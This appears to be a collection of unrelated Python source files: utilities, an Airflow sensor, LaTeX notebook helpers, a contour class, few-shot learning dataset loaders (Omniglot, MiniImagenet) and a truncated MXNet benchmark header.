def sanitize_path(root_path, path):
return os.path.join(root_path, path)
# current_path can be a file or directory, and can be absolute or relative
def find_project_settings(current_path) -> ProjectSettings:
project_root = find_dir_containing_file_recursing_upwards(current_path, PROJECT_ROOT_FILE_NAME)
if not project_root:
return None
project_file_path = os.path.join(project_root, PROJECT_ROOT_FILE_NAME)
project_settings_json_obj = None
with open(project_file_path, "r") as f:
try:
project_settings_json_obj = json.load(f)
except json.decoder.JSONDecodeError:
            logger.error("Project file %s could not be parsed as json", project_file_path)
return None
project_settings = {
ART_DIR: sanitize_path(project_root, project_settings_json_obj[ART_DIR]),
ASSETS_DIR: sanitize_path(project_root, project_settings_json_obj[ASSETS_DIR])
}
    logger.debug("Project settings: %s", project_settings)
return project_settings
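# Illustrative usage sketch, not part of the original module: walk upwards from
# the current working directory looking for the ".rafx_project" marker file.
if __name__ == "__main__":
    root = find_dir_containing_file_recursing_upwards(os.getcwd(), ".rafx_project")
    print("project root:", root)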
|
1709765
|
from spaceone.core.error import *
class ERROR_USER_STATUS_CHECK_FAILURE(ERROR_BASE):
_message = 'A user "{user_id}" status is not ENABLED.'
class ERROR_EXTERNAL_USER_NOT_ALLOWED_API_USER(ERROR_INVALID_ARGUMENT):
_message = 'External user cannot be created with the API_USER type.'
class ERROR_NOT_ALLOWED_EXTERNAL_AUTHENTICATION(ERROR_INVALID_ARGUMENT):
_message = 'This domain does not allow external authentication.'
class ERROR_TOO_MANY_USERS_IN_EXTERNAL_AUTH(ERROR_INVALID_ARGUMENT):
_message = 'There are two or more users in the external authentication system. (user_id = {user_id})'
class ERROR_NOT_FOUND_USER_IN_EXTERNAL_AUTH(ERROR_INVALID_ARGUMENT):
_message = 'The user could not be found in the external authentication system. (user_id = {user_id})'
class ERROR_INCORRECT_PASSWORD_FORMAT(ERROR_INVALID_ARGUMENT):
_message = 'The password format is incorrect. (rule = {rule})'
class ERROR_INCORRECT_USER_ID_FORMAT(ERROR_INVALID_ARGUMENT):
_message = 'The user id format is incorrect. (rule = {rule})'
|
1709778
|
from typing import Any, Dict, Optional
from airflow.providers.http.sensors.http import HttpSensor
from airflow.utils.context import Context
from astronomer.providers.http.triggers.http import HttpTrigger
class HttpSensorAsync(HttpSensor):
"""
Executes a HTTP GET statement and returns False on failure caused by
404 Not Found or `response_check` returning False.
.. note::
If ``response_check`` is passed, the sync version of the sensor will be used.
The response check can access the template context to the operator:
.. code-block:: python
def response_check(response, task_instance):
# The task_instance is injected, so you can pull data form xcom
# Other context variables such as dag, ds, execution_date are also available.
xcom_data = task_instance.xcom_pull(task_ids="pushing_task")
# In practice you would do something more sensible with this data..
print(xcom_data)
return True
HttpSensorAsync(task_id="my_http_sensor", ..., response_check=response_check)
:param http_conn_id: The Connection ID to run the sensor against
:type http_conn_id: str
:param method: The HTTP request method to use
:type method: str
:param endpoint: The relative part of the full url
:type endpoint: str
:param request_params: The parameters to be added to the GET url
:type request_params: a dictionary of string key/value pairs
:param headers: The HTTP headers to be added to the GET request
:type headers: a dictionary of string key/value pairs
:param response_check: A check against the 'requests' response object.
The callable takes the response object as the first positional argument
and optionally any number of keyword arguments available in the context dictionary.
It should return True for 'pass' and False otherwise.
:type response_check: A lambda or defined function.
:param extra_options: Extra options for the 'requests' library, see the
'requests' documentation (options to modify timeout, ssl, etc.)
:type extra_options: A dictionary of options, where key is string and value
depends on the option that's being modified.
"""
def execute(self, context: Context) -> None:
"""
Logic that the sensor uses to correctly identify which trigger to
execute, and defer execution as expected.
"""
# TODO: We can't currently serialize arbitrary function
# Maybe we set method_name as users function??? to run it again
# and evaluate the response.
if self.response_check:
super().execute(context=context)
else:
self.defer(
timeout=self.execution_timeout,
trigger=HttpTrigger(
method=self.hook.method, # TODO: Fix this to directly get method from ctor
endpoint=self.endpoint,
data=self.request_params,
headers=self.headers,
extra_options=self.extra_options,
),
method_name="execute_complete",
)
def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[Any, Any]] = None) -> None:
"""
Callback for when the trigger fires - returns immediately.
Relies on trigger to throw an exception, otherwise it assumes execution was
successful.
"""
self.log.info("%s completed successfully.", self.task_id)
return None
|
1709797
|
from IPython.display import Latex, display
from nbconvert.filters.pandoc import convert_pandoc
def latex(text, color="", **kwargs):
"""print in latex"""
if color:
text = "\\textcolor{%s}{%s}" % (color, text)
return Latex(text + "\n", **kwargs)
def print(text, **kwargs):
"""wrapper around printing"""
if not isinstance(text, str):
display(text)
return
display(
latex(
convert_pandoc(
text + "\\newline", "markdown+tex_math_double_backslash", "latex"
),
**kwargs
)
)
def hr():
"""horizontal rule"""
return latex("\\noindent\\makebox[\\linewidth]{\\rule{\\paperwidth - 1cm}{0.4pt}}")
def newpage():
"""make a new page. in html, this just does a horizontal rule"""
return latex("\\newpage")
def table(df, title="", footnote=""):
"""helper to display a table"""
return latex(
"\\begin{center} "
"\\begin{threeparttable}"
"\\caption{" + title + "}" + df.to_latex(escape=False) + "\\begin{tablenotes}"
"\\small"
"\\item " + footnote + "\\end{tablenotes}"
"\\end{threeparttable}"
"\\end{center}"
)
def pagenum():
"""display a page number (latex only)"""
return latex("\\thepage")
def _make(text, h_type):
return convert_pandoc(
"#" * h_type + " " + text + "\n", "markdown+tex_math_double_backslash", "latex"
)
def p(text, **kwargs):
return Latex(text, **kwargs)
def h1(text, **kwargs):
return Latex(_make(text, 1), **kwargs)
def h2(text, **kwargs):
return Latex(_make(text, 2), **kwargs)
def h3(text, **kwargs):
return Latex(_make(text, 3), **kwargs)
def h4(text, **kwargs):
return Latex(_make(text, 4), **kwargs)
def h5(text, **kwargs):
return Latex(_make(text, 5), **kwargs)
def grid(items_and_weights):
print(Latex("\n\\begin{Row}%\n"))
for val, width in items_and_weights:
print(Latex("\n\\begin{Cell}{" + str(width) + "}\n"))
if not isinstance(val, str):
print(Latex("\\vspace*{-.4cm}\n"))
print(val)
print(Latex("\n\n\\end{Cell}\n"))
print(Latex("\n\\end{Row}\n"))
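# Illustrative usage sketch, not part of the original module: these helpers are
# meant for notebooks exported to LaTeX via nbconvert, and the heading helper
# requires pandoc to be available for the markdown conversion.
if __name__ == "__main__":
    display(h1("Results"))
    display(latex("All timings are reported in seconds.", color="gray"))
    display(hr())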
|
1709822
|
from __future__ import division
import numpy as np
from numpy import pi
from ..Contour import Contour
from ..Paths import ComplexArc
from .Annulus import Annulus
class Circle(Contour):
"""
A positively oriented circle in the complex plane.
Parameters
----------
center : complex
The center of the circle.
radius : float
The radius of the circle.
Examples
--------
.. plot::
:include-source:
from cxroots import Circle
circle = Circle(center=1, radius=0.5)
circle.show()
"""
def __init__(self, center, radius):
self.center = center
self.radius = radius
        self.axisName = ('r',)
segments = [ComplexArc(center, radius, 0, 2*pi)]
super(Circle, self).__init__(segments)
def __str__(self):
return 'Circle: center={center.real:.3f}{center.imag:+.3f}i, radius={radius:.3f}'.format(center=self.center, radius=self.radius)
def contains(self, z):
""" Returns True if the point z lies within the contour, False if otherwise """
return abs(z - self.center) < self.radius
@property
def centralPoint(self):
return self.center
@property
def area(self):
return pi*self.radius**2
def subdivide(self, axis='r', divisionFactor=0.5):
"""
Subdivide the contour
Parameters
----------
axis : str, can only be 'r' (argument kept for consistency with 'subdivisions' method in parent Contour class)
The axis along which the line subdividing the contour is a constant.
divisionFactor : float in range (0,1), optional
Determines the point along 'axis' at which the line dividing the box is placed
Returns
-------
box1 : Annulus
With inner radius determined by the divisionFactor and outer radius equal to that of the original circle
box2 : Circle
With radius equal to the inner radius of box1
"""
if axis == 'r' or self.axisName[axis] == 'r':
box1 = Annulus(self.center, [self.radius*divisionFactor, self.radius])
box2 = Circle(self.center, self.radius*divisionFactor)
box1.segments[0] = self.segments[0]
box1.segments[1]._reversePath = box2.segments[0]
box2.segments[0]._reversePath = box1.segments[1]
for box in [box1, box2]:
box._createdBySubdivisionAxis = axis
box._parentBox = self
self._childBoxes = [box1, box2]
return box1, box2
def randomPoint(self):
""" Returns a random point inside the Circle """
r = np.random.uniform(0,self.radius)
phi = np.random.uniform(0,2*pi)
        return r*np.exp(1j*phi) + self.center
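# Illustrative usage sketch, not part of the original class; kept as a module-level
# helper rather than a __main__ block because this file uses relative imports.
# The centre, radius and probe point below are arbitrary.
def _example_subdivision():
    circle = Circle(center=1, radius=0.5)
    annulus, inner = circle.subdivide(divisionFactor=0.5)
    print(circle)
    print("contains 1.2:", circle.contains(1.2))
    print("inner circle after subdivision:", inner)
    return annulus, inner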
|
1709832
|
import manta_lab as ml
from manta_lab.tuning.internal import FunctionAgent, ProgramAgent
logger = None
class AgentError(Exception):
pass
def program_agent(api, tune_id, function, entity=None, project=None, count=None, in_jupyter=False):
    # placeholder: program-based tuning is not wired up yet; ProgramAgent is
    # imported above but never instantiated here
    return
def function_agent(api, tune_id, function, entity=None, project=None, count=None):
"""Generic agent entrypoint, used for CLI or jupyter.
Arguments:
tune_id (dict): Sweep ID generated by CLI or tune API
function (func, optional): A function to call instead of the "program"
entity (str, optional): MantaLab Entity
project (str, optional): MantaLab Project
count (int, optional): the number of trials to run.
"""
if not callable(function):
raise Exception("function paramter must be callable!")
agent = FunctionAgent(
api=api,
tune_id=tune_id,
function=function,
entity=entity,
project=project,
count=count,
logger=logger,
)
agent.run()
def agent(tune_id, function=None, entity=None, project=None, count=None):
"""
Generic agent entrypoint.
Will run a function or program with configuration parameters.
"""
kwargs = locals()
global _INSTANCES
_INSTANCES += 1
try:
# make sure we are logged in
api = ml.api.MantaAPI()
if function:
return function_agent(api=api, **kwargs)
in_jupyter = not ml.util.ensure_python()
return program_agent(api=api, in_jupyter=in_jupyter, **kwargs)
finally:
_INSTANCES -= 1
_INSTANCES = 0
def is_running():
return bool(_INSTANCES)
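# A hedged usage sketch of the agent() entrypoint above. The tune id, entity and
# project names are placeholders, and MantaAPI() is assumed to pick up credentials
# from the environment; this is illustrative, not part of the module itself.
def _train_once():
    # Hypothetical trial function: a real one would read hyperparameters from the
    # current tuning run and report metrics back through manta_lab.
    print("running one trial")

if __name__ == "__main__":
    agent(tune_id="example-tune-id", function=_train_once,
          entity="example-entity", project="example-project", count=3)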
|
1709864
|
import json
import socket
from typing import Optional, Any, Mapping, Callable, Type, Tuple
import requests
from urlobject import URLObject
from urlobject.path import URLPath
from .common import translate_dict_func
def get_host_ip() -> Optional[str]:
s = None
try:
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.connect(('8.8.8.8', 80))
# ip = s.getsockname()[0]
myname = socket.getfqdn(socket.gethostname())
ip = socket.gethostbyname(myname)
finally:
if s is not None:
s.close()
return ip
_DEFAULT_HTTP_PORT = 80
_DEFAULT_HTTPS_PORT = 443
def split_http_address(address: str, default_port: Optional[int] = None) -> Tuple[str, int, bool, str]:
_url = URLObject(address)
_host = _url.hostname
_https = (_url.scheme.lower()) == 'https'
_port = _url.port or default_port or (_DEFAULT_HTTPS_PORT if _https else _DEFAULT_HTTP_PORT)
_path = str(_url.path) or ''
return _host, _port, _https, _path
class HttpEngine:
    def __init__(self, host: str, port: int, https: bool = False, path: Optional[str] = None):
self.__base_url = URLObject().with_scheme('https' if https else 'http') \
.with_hostname(host).with_port(port).add_path(path or '')
self.__session = requests.session()
# noinspection PyMethodMayBeStatic
def _data_process(self, data: Optional[Mapping[str, Any]] = None) -> Mapping[str, Any]:
return data or {}
# noinspection PyMethodMayBeStatic
    def _base_headers(self) -> Mapping[str, Any]:
return {}
def get_url(self, path: str = None):
original_segments = self.__base_url.path.segments
path_segments = URLPath().add(path or '').segments
return str(self.__base_url.with_path(URLPath.join_segments(original_segments + path_segments)))
def request(
self,
method: str,
path: str,
data: Optional[Mapping[str, Any]] = None,
headers: Optional[Mapping[str, Any]] = None,
params: Optional[Mapping[str, Any]] = None,
raise_for_status: bool = True,
) -> requests.Response:
_headers = dict(self._base_headers())
_headers.update(headers or {})
response = self.__session.request(
method=method,
url=self.get_url(path),
data=json.dumps(self._data_process(data) or {}),
headers=_headers or {},
params=params or {},
)
if raise_for_status:
response.raise_for_status()
return response
def get_http_engine_class(
headers: Mapping[str, Callable[..., Any]],
data_processor: Optional[Callable[[Mapping[str, Any]], Mapping[str, Any]]] = None
) -> Callable[..., Type[HttpEngine]]:
def _func(*args, **kwargs) -> Type[HttpEngine]:
class _HttpEngine(HttpEngine):
def _data_process(self, data: Optional[Mapping[str, Any]] = None) -> Mapping[str, Any]:
return (data_processor or (lambda d: d or {}))(data or {})
            def _base_headers(self) -> Mapping[str, Any]:
return translate_dict_func(headers)(*args, **kwargs)
return _HttpEngine
return _func
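# A minimal sketch of HttpEngine usage based only on the helpers defined above.
# The host and endpoint are placeholders, and request() performs a real HTTP round
# trip, so this is illustrative rather than something to run blindly.
if __name__ == "__main__":
    host, port, https, path = split_http_address('https://api.example.com/v1')
    engine = HttpEngine(host, port, https=https, path=path)
    print(engine.get_url('users'))  # -> https://api.example.com:443/v1/users
    response = engine.request('GET', 'users', params={'page': 1}, raise_for_status=False)
    print(response.status_code)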
|
1709885
|
class Solution:
"""
@param nums:
@param sub:
@return: return a Integer array
"""
def SimpleQueries(self, nums, sub):
# write your code here
if len(sub) == 0:
return []
if len(nums) == 0:
return [0 for _ in range(len(sub))]
# O(n logn)
self.nums = nums
self.nums.sort()
results = []
for target in sub:
res = self._binarySearch(target)
results.append(res)
return results
def _binarySearch(self, target):
start, end = 0, len(self.nums) - 1
while start + 1 < end:
mid = start + (end - start) // 2
if self.nums[mid] <= target:
start = mid
else:
end = mid
if self.nums[end] <= target:
return end + 1
if self.nums[start] <= target:
return start + 1
return 0
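# A quick check of the counting behaviour described in the docstring above:
# for each query value q, the answer is the number of elements of nums that are <= q.
if __name__ == "__main__":
    solver = Solution()
    print(solver.SimpleQueries([1, 2, 3, 3, 7], [2, 3, 8]))  # expected output: [2, 4, 5]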
|
1709906
|
import random
class Fish():
def __init__(self, name, color, gender, species, weight):
self.name = name
self.color = color
self.gender = gender
self.species = species
self.weight = weight
self.age = 0
self.stamina = "low" if random.randint(0,1) == 0 else "high"
self.speed = "slow" if random.randint(0,1) == 0 else "fast"
print("A fish is born")
print("This fish's name is", name + ".", name, "is a", weight, ",", color, ",",
gender, species)
    def swim(self, distance):
        # slow fish travel at 1 meter per second
        # fast fish travel at 2 meters per second
        if self.speed == "slow":
            rate_of_movement = 1
        else:
            rate_of_movement = 2
        # low-stamina fish swim at half speed once they have covered 50 meters
        if self.stamina == "low":
            rate_of_movement_after_fifty_meters = rate_of_movement / 2
        else:
            rate_of_movement_after_fifty_meters = rate_of_movement
        if distance <= 50:
            seconds_travelled = distance / rate_of_movement
        else:
            seconds_travelled = (50 / rate_of_movement
                                 + (distance - 50) / rate_of_movement_after_fifty_meters)
        print("The fish travelled", distance, "meters in", seconds_travelled,
              "seconds")
        return seconds_travelled
# if a fish with low stamina travels over 50 meters, its speed is
# halved
# high stamina fish never get tired...
#identify the average speed of the fish over some distance and the time
# taken to complete the swim
fish = Fish(name = "Harold", color = "blue and gold", gender = "male",
species = "shubunkin", weight = "4 ounces")
distance_dict = {}
for i in range(101):
distance_dict[i] = fish.swim(i)
print(distance_dict)
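# A small follow-up sketch for the "average speed" part of the exercise above.
# average_speed() is a hypothetical helper, not part of the original script; it
# simply divides the distance by the time reported by swim().
def average_speed(fish_obj, distance):
    seconds = fish_obj.swim(distance)
    return distance / seconds if seconds > 0 else 0.0

print("Average speed over 100 meters:", average_speed(fish, 100), "m/s")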
#print(fish)
#
#x = " D F"
#y = 1
#
#print("x is a:", type(x))
#print("y is a:", type(y))
#
#lst = [i for i in range(20)]
#type_lst = [type(val) for val in lst]
#print(type_lst)
#print(type([[],[],[]]))
#
#
#
##
##for val in lst:
## val_type = type(val)
## print(val_type)
##
|
1709926
|
from django.urls import path
from system.views import login_view, UserPasswordUpdateView, logout_view, UserInfo, UserLogout,Menu
app_name = "system"
urlpatterns = [
path('login', login_view, name="login"),
path('password_update', UserPasswordUpdateView.as_view(), name="password_update"),
path('logout', logout_view, name="logout"),
path('api/user_info', UserInfo.as_view()),
path('api/logout', UserLogout.as_view()),
path('menu',Menu.as_view())
]
|
1709992
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import os
import json
import glob
import h5py
import numpy as np
import pickle
from PIL import Image, ImageOps
import torch
from torchmeta.utils.data.task import Task, ConcatTask, SubsetTask
from collections import OrderedDict
from torchmeta.utils.data import Dataset, ClassDataset, CombinationMetaDataset, MetaDataLoader
from torchmeta.utils.data.dataloader import batch_meta_collate
from torchvision.datasets.utils import list_dir, download_url, download_file_from_google_drive
from torchmeta.datasets.utils import get_asset
import warnings
from torchmeta.datasets.omniglot import OmniglotDataset
from torchmeta.datasets.miniimagenet import MiniImagenetDataset
from torchmeta.transforms import Categorical, ClassSplitter, Rotation, Splitter
from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor
class OmniglotClassDataset(ClassDataset):
folder = 'omniglot'
download_url_prefix = 'https://github.com/brendenlake/omniglot/raw/master/python'
zips_md5 = {
'images_background': '68d2efa1b9178cc56df9314c21c6e718',
'images_evaluation': '6b91aef0f799c5bb55b94e3f2daec811'
}
filename = 'data.hdf5'
filename_labels = '{0}_labels.json'
def __init__(self, root, meta_train=False, meta_val=False, meta_test=False,
meta_split=None, transform=None,
class_augmentations=None, download=False):
super(OmniglotClassDataset, self).__init__(meta_train=meta_train,
meta_val=meta_val, meta_test=meta_test, meta_split=meta_split,
class_augmentations=class_augmentations)
self.root = os.path.join(os.path.expanduser(root), self.folder)
self.transform = transform
self.split_filename = os.path.join(self.root, self.filename)
self.split_filename_labels = os.path.join(self.root,
self.filename_labels.format(self.meta_split))
self._data = None
self._labels = None
if download:
self.download()
if not self._check_integrity():
raise RuntimeError('Omniglot integrity check failed')
self._num_classes = len(self.labels)
print('# classes loaded for %s:' % self.meta_split, self._num_classes)
def __getitem__(self, index):
character_name = '/'.join(self.labels[index % self.num_classes])
data = self.data[character_name]
transform = self.get_transform(index, self.transform)
target_transform = self.get_target_transform(index)
return OmniglotDataset(data, character_name, transform=transform,
target_transform=target_transform)
@property
def num_classes(self):
return self._num_classes
@property
def data(self):
if self._data is None:
self._data = h5py.File(self.split_filename, 'r')
return self._data
@property
def labels(self):
if self._labels is None:
with open(self.split_filename_labels, 'r') as f:
self._labels = json.load(f)
return self._labels
def _check_integrity(self):
return (os.path.isfile(self.split_filename)
and os.path.isfile(self.split_filename_labels))
def close(self):
if self._data is not None:
self._data.close()
self._data = None
def download(self):
import zipfile
import shutil
if self._check_integrity():
return
for name in self.zips_md5:
zip_filename = '{0}.zip'.format(name)
filename = os.path.join(self.root, zip_filename)
if os.path.isfile(filename):
continue
url = '{0}/{1}'.format(self.download_url_prefix, zip_filename)
download_url(url, self.root, zip_filename, self.zips_md5[name])
with zipfile.ZipFile(filename, 'r') as f:
f.extractall(self.root)
filename = os.path.join(self.root, self.filename)
with h5py.File(filename, 'w') as f:
group = f.create_group('omniglot')
for name in self.zips_md5:
alphabets = list_dir(os.path.join(self.root, name))
characters = [(name, alphabet, character) for alphabet in alphabets
for character in list_dir(os.path.join(self.root, name, alphabet))]
for _, alphabet, character in characters:
filenames = glob.glob(os.path.join(self.root, name,
alphabet, character, '*.png'))
dataset = group.create_dataset('{0}/{1}'.format(alphabet,
character), (len(filenames), 105, 105), dtype='uint8')
for i, char_filename in enumerate(filenames):
image = Image.open(char_filename, mode='r').convert('L')
dataset[i] = ImageOps.invert(image)
shutil.rmtree(os.path.join(self.root, name))
class MiniImagenetClassDataset(ClassDataset):
folder = 'miniimagenet'
# Google Drive ID from https://github.com/renmengye/few-shot-ssl-public
gdrive_id = '16V_ZlkW4SsnNDtnGmaBRq2OoPmUOc5mY'
gz_filename = 'mini-imagenet.tar.gz'
gz_md5 = 'b38f1eb4251fb9459ecc8e7febf9b2eb'
pkl_filename = 'mini-imagenet-cache-{0}.pkl'
filename = '{0}_data.hdf5'
filename_labels = '{0}_labels.json'
def __init__(self, root, meta_train=False, meta_val=False, meta_test=False,
meta_split=None, transform=None, class_augmentations=None,
download=False):
super(MiniImagenetClassDataset, self).__init__(meta_train=meta_train,
meta_val=meta_val, meta_test=meta_test, meta_split=meta_split,
class_augmentations=class_augmentations)
self.root = os.path.join(os.path.expanduser(root), self.folder)
self.transform = transform
self.split_filename = os.path.join(self.root,
self.filename.format(self.meta_split))
self.split_filename_labels = os.path.join(self.root,
self.filename_labels.format(self.meta_split))
self._data = None
self._labels = None
if download:
self.download()
if not self._check_integrity():
raise RuntimeError('MiniImagenet integrity check failed')
self._num_classes = len(self.labels)
print('# classes loaded for %s:' % self.meta_split, self._num_classes)
def __getitem__(self, index):
class_name = self.labels[index % self.num_classes]
data = self.data[class_name]
transform = self.get_transform(index, self.transform)
target_transform = self.get_target_transform(index)
return MiniImagenetDataset(data, class_name, transform=transform,
target_transform=target_transform)
@property
def num_classes(self):
return self._num_classes
@property
def data(self):
if self._data is None:
self._data_file = h5py.File(self.split_filename, 'r')
self._data = self._data_file['datasets']
return self._data
@property
def labels(self):
if self._labels is None:
with open(self.split_filename_labels, 'r') as f:
self._labels = json.load(f)
return self._labels
def _check_integrity(self):
return (os.path.isfile(self.split_filename)
and os.path.isfile(self.split_filename_labels))
def close(self):
if self._data_file is not None:
self._data_file.close()
self._data_file = None
self._data = None
def download(self):
import tarfile
if self._check_integrity():
return
download_file_from_google_drive(self.gdrive_id, self.root,
self.gz_filename, md5=self.gz_md5)
filename = os.path.join(self.root, self.gz_filename)
with tarfile.open(filename, 'r') as f:
f.extractall(self.root)
for split in ['train', 'val', 'test']:
filename = os.path.join(self.root, self.filename.format(split))
if os.path.isfile(filename):
continue
pkl_filename = os.path.join(self.root, self.pkl_filename.format(split))
if not os.path.isfile(pkl_filename):
raise IOError()
with open(pkl_filename, 'rb') as f:
data = pickle.load(f)
images, classes = data['image_data'], data['class_dict']
with h5py.File(filename, 'w') as f:
group = f.create_group('datasets')
for name, indices in classes.items():
group.create_dataset(name, data=images[indices])
labels_filename = os.path.join(self.root, self.filename_labels.format(split))
with open(labels_filename, 'w') as f:
labels = sorted(list(classes.keys()))
json.dump(labels, f)
if os.path.isfile(pkl_filename):
os.remove(pkl_filename)
class MiniImagenet(CombinationMetaDataset):
def __init__(self, root, num_classes_per_task=None, meta_train=False,
meta_val=False, meta_test=False, meta_split=None,
transform=None, target_transform=None, dataset_transform=None,
class_augmentations=None, download=False):
dataset = MiniImagenetClassDataset(root, meta_train=meta_train,
meta_val=meta_val, meta_test=meta_test, meta_split=meta_split,
transform=transform, class_augmentations=class_augmentations,
download=download)
super(MiniImagenet, self).__init__(dataset, num_classes_per_task,
target_transform=target_transform, dataset_transform=dataset_transform)
class Omniglot(CombinationMetaDataset):
def __init__(self, root, num_classes_per_task=None, meta_train=False,
meta_val=False, meta_test=False, meta_split=None,
transform=None, target_transform=None,
dataset_transform=None, class_augmentations=None, download=False):
dataset = OmniglotClassDataset(root, meta_train=meta_train,
meta_val=meta_val, meta_test=meta_test,
transform=transform,
meta_split=meta_split, class_augmentations=class_augmentations,
download=download)
super(Omniglot, self).__init__(dataset, num_classes_per_task,
target_transform=target_transform, dataset_transform=dataset_transform)
class RandClassSplitter(Splitter):
def __init__(self, min_train_per_class, max_train_per_class, num_test_per_class, shuffle=True):
self.shuffle = shuffle
num_samples_per_class = OrderedDict()
num_samples_per_class['train'] = (min_train_per_class, max_train_per_class)
num_samples_per_class['test'] = (num_test_per_class, num_test_per_class)
self._min_samples_per_class = min_train_per_class + num_test_per_class
super(RandClassSplitter, self).__init__(num_samples_per_class)
def _rand_split_size(self, list_n_samples):
cur_size = OrderedDict()
for split, range_split in self.splits.items():
d = range_split[1] - range_split[0] + 1
for num_samples in list_n_samples:
d = min(d, num_samples - self._min_samples_per_class + 1)
cur_size[split] = np.random.randint(d) + range_split[0]
return cur_size
def get_indices_task(self, task):
all_class_indices = self._get_class_indices(task)
indices = OrderedDict([(split, []) for split in self.splits])
        cur_size = self._rand_split_size([len(class_indices) for class_indices in all_class_indices.values()])
for name, class_indices in all_class_indices.items():
num_samples = len(class_indices)
if num_samples < self._min_samples_per_class:
raise ValueError('The number of samples for class `{0}` ({1}) '
'is smaller than the minimum number of samples per class '
'required by `ClassSplitter` ({2}).'.format(name,
num_samples, self._min_samples_per_class))
if self.shuffle:
# TODO: Replace torch.randperm with seed-friendly counterpart
dataset_indices = torch.randperm(num_samples).tolist()
ptr = 0
for split, num_split in cur_size.items():
split_indices = (dataset_indices[ptr:ptr + num_split]
if self.shuffle else range(ptr, ptr + num_split))
indices[split].extend([class_indices[idx] for idx in split_indices])
ptr += num_split
return indices
def get_indices_concattask(self, task):
indices = OrderedDict([(split, []) for split in self.splits])
cum_size = 0
cur_size = self._rand_split_size([len(x) for x in task.datasets])
for dataset in task.datasets:
num_samples = len(dataset)
if num_samples < self._min_samples_per_class:
raise ValueError('The number of samples for one class ({0}) '
'is smaller than the minimum number of samples per class '
'required by `ClassSplitter` ({1}).'.format(num_samples,
self._min_samples_per_class))
if self.shuffle:
# TODO: Replace torch.randperm with seed-friendly counterpart
dataset_indices = torch.randperm(num_samples).tolist()
ptr = 0
for split, num_split in cur_size.items():
split_indices = (dataset_indices[ptr:ptr + num_split]
if self.shuffle else range(ptr, ptr + num_split))
indices[split].extend([idx + cum_size for idx in split_indices])
ptr += num_split
cum_size += num_samples
return indices
def _update_args(shots, ways, kwargs, shuffle=True, test_shots=None):
if 'num_classes_per_task' in kwargs:
assert ways == kwargs['num_classes_per_task']
del kwargs['num_classes_per_task']
if 'target_transform' not in kwargs:
kwargs['target_transform'] = Categorical(ways)
if 'class_augmentations' not in kwargs:
kwargs['class_augmentations'] = [Rotation([90, 180, 270])]
if isinstance(shots, int):
min_shot = max_shot = shots
else:
min_shot, max_shot = shots
if test_shots is None:
test_shots = min_shot
if 'dataset_transform' not in kwargs:
if min_shot == max_shot:
dataset_transform = ClassSplitter(shuffle=shuffle,
num_train_per_class=min_shot,
num_test_per_class=test_shots)
else:
dataset_transform = RandClassSplitter(shuffle=shuffle,
min_train_per_class=min_shot,
max_train_per_class=max_shot,
num_test_per_class=test_shots)
kwargs['dataset_transform'] = dataset_transform
return kwargs
def omniglot(folder, shots, ways, shuffle=True, test_shots=None,
seed=None, **kwargs):
if 'transform' not in kwargs:
kwargs['transform'] = Compose([Resize(28), ToTensor()])
kwargs = _update_args(shots, ways, kwargs, shuffle, test_shots)
dataset = Omniglot(folder, num_classes_per_task=ways, **kwargs)
dataset.seed(seed)
return dataset
def miniimagenet(folder, shots, ways, shuffle=True, test_shots=None,
seed=None, **kwargs):
if 'transform' not in kwargs:
kwargs['transform'] = Compose([Resize(84), ToTensor()])
kwargs = _update_args(shots, ways, kwargs, shuffle, test_shots)
dataset = MiniImagenet(folder, num_classes_per_task=ways, **kwargs)
dataset.seed(seed)
return dataset
from torch.utils.data.dataloader import default_collate
from torch.utils.data.dataset import Dataset as TorchDataset
def batch_list_collate(collate_fn):
def collate_task(task):
if isinstance(task, TorchDataset):
return collate_fn([task[idx] for idx in range(len(task))])
elif isinstance(task, OrderedDict):
return OrderedDict([(key, collate_task(subtask))
for (key, subtask) in task.items()])
else:
raise NotImplementedError()
def _collate_fn(batch):
batch = [collate_task(task) for task in batch]
assert isinstance(batch[0], OrderedDict)
keys = list(batch[0].keys())
out_dict = OrderedDict()
for key in keys:
out_dict[key] = [x[key] for x in batch]
return out_dict
return _collate_fn
def no_collate(batch):
return batch
class ListMetaDataLoader(MetaDataLoader):
def __init__(self, dataset, batch_size=1, shuffle=True, num_workers=0,
pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None):
collate_fn = batch_list_collate(default_collate)
super(ListMetaDataLoader, self).__init__(dataset,
batch_size=batch_size, shuffle=shuffle, sampler=None,
batch_sampler=None, num_workers=num_workers,
collate_fn=collate_fn, pin_memory=pin_memory, drop_last=drop_last,
timeout=timeout, worker_init_fn=worker_init_fn)
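# A hedged usage sketch of the helpers defined above. The data folder is a
# placeholder and download=True fetches Omniglot on first use; passing a
# (min, max) tuple for shots exercises the RandClassSplitter branch of
# _update_args, which is why the list-based collate of ListMetaDataLoader
# is needed (tasks in one batch can have different numbers of samples).
if __name__ == "__main__":
    dataset = omniglot("data", shots=(1, 5), ways=5, test_shots=5,
                       meta_train=True, download=True)
    loader = ListMetaDataLoader(dataset, batch_size=4, num_workers=0)
    batch = next(iter(loader))
    train_inputs, train_targets = batch["train"][0]  # first task in the batch
    print(train_inputs.shape, train_targets.shape)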
|
1710028
|
from __future__ import print_function
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ctypes
from mxnet.test_utils import *
import scipy.sparse as sp
import os
import time
import argparse
from mxnet.base import check_call, _LIB
from mxnet.test_utils import get_bz2_data
from util import estimate_density
parser = argparse.ArgumentParser(description="Benchmark sparse operators",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-omp-threads', type=int, default=1, help='number of omp threads to set in MXNet')
args = parser.parse_args()
# some data information
kdda = {
'data_mini': 'kdda.t.mini',
'data_name': 'kdda.t',
'data_origin_name': 'kdda.t.bz2',
'url': "https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/binary/kdda.t.bz2",
'feature_dim': 20216830,
'm': 200,
'batch_size': [64]
}
avazu = {
'data_mini': 'avazu-app.t.mini',
